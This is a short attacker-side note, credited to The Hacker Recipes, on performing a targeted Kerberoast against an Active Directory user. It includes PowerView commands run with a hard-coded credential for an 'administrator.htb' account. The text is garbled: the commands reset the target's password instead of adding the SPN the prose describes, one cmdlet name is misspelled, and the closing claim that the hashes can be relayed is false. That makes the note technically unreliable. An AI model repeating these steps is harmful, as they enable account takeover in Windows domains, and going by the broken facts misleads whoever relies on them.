Source: The-Hacker-Recipes.

This attack requires a controlling object that has WriteProperty, GenericWrite, or GenericAll over a target user.

How To Perform a Targeted Kerberoast!

The attacker can add a Service Principal Name to the target account. Once the account has a SPN it can be kerberoasted as mentioned above. To Achieve this, Set-DomainObject and Get-Domain-SPNTicket from PowerView can be used.

. .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'Password123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\benjamin', $SecPassword)
$UserPassword = ConvertTo-SecureString 'Password123' -AsPlainText -Force
Set-DomainUserPassword -Identity benjamin -AccountPassword $UserPassword

Targeted Kerberoast Limitations

These hashes can not be used for pass the hash, but, they are crackable and can be relayed :)